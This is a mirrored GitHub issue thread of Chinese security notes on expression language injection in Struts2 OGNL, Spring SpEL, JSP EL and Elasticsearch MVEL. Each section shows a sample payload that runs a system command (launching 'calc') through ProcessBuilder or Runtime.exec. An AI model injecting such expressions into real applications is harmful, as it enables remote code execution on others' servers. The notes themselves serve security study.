Code Monkey home page Code Monkey logo

Comments (7)

n4ttt avatar n4ttt commented on August 15, 2024

表达式注入概念:

2013年4月15日Expression Language Injection词条在OWASP上被创建,而这个词的最早出现可以追溯到2012年12月的《Remote-Code-with-Expression-Language-Injection》一文,在这个paper中第一次提到了这个名词。

而这个时期,只不过还只是把它叫做远程代码执行漏洞、远程命令执行漏洞或者上下文操控漏洞。像Struts2系列的s2-003、s2-009、s2-016等,这种由OGNL表达式引起的命令执行漏洞。

from sec-note.

n4ttt avatar n4ttt commented on August 15, 2024

Struts2——OGNL

实至名归的“漏洞之王”,表达式的格式:

    ​      @[类全名(包括包路径)]@[方法名 |  值名],例如:
    ​             @java.lang.String@format('foo %s', 'bar')

基本用法:

    java
    ActionContext AC = ActionContext.getContext();
    Map Parameters = (Map)AC.getParameters();
    String expression = "${(new java.lang.ProcessBuilder('calc')).start()}";
    AC.getValueStack().findValue(expression));

相关漏洞:

s2-009、s2-012、s2-013、s2-014、s2-015、s2-016,s2-017

from sec-note.

n4ttt avatar n4ttt commented on August 15, 2024

Spring——SPEL

SPEL即Spring EL,故名思议是Spring框架专有的EL表达式。相对于其他几种表达式语言,使用面相对较窄,但是从Spring框架被使用的广泛性来看,还是有值得研究的价值的。

基本用法:

在jsp页面中可以使用el表达式代替<%=%>,之间访问java对象。

String expression = "T(java.lang.Runtime).getRuntime().exec(/"calc/")";
String result = parser.parseExpression(expression).getValue().toString();

from sec-note.

n4ttt avatar n4ttt commented on August 15, 2024

JSP——JSTL_EL

这种表达式是JSP语言自带的表达式,也就是说所有的Java Web服务都必然会支持这种表达式。但是由于各家对其实现的不同,也导致某些漏洞可以在一些Java Web服务中成功利用,而在有的服务中则是无法利用。

基本用法:

jsp
<spring:message text="${/"/".getClass().forName(/"java.lang.Runtime/").getMethod(/"getRuntime/",null).invoke(null,null).exec(/"calc/",null).toString()}">
</spring:message>

from sec-note.

n4ttt avatar n4ttt commented on August 15, 2024

Elasticsearch——MVEL

Elasticsearch的CVE-2014-3120这个漏洞

MVEL是同OGNL和SPEL一样,具有通过表达式执行Java代码的强大功能。

基本用法:

java import org.mvel.MVEL;  
public class MVELTest {  
​        public static void main(String[] args) {  
​              String expression = "new java.lang.ProcessBuilder(/"calc/").start();";  
​               Boolean result = (Boolean) MVEL.eval(expression, vars);  
​         }  
  }

from sec-note.

n4ttt avatar n4ttt commented on August 15, 2024

以上是表达式的介绍,详细利用方式请查看URL链接里面的内容。

from sec-note.

n4ttt avatar n4ttt commented on August 15, 2024

有待实战测试。

from sec-note.

Related Issues (8)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.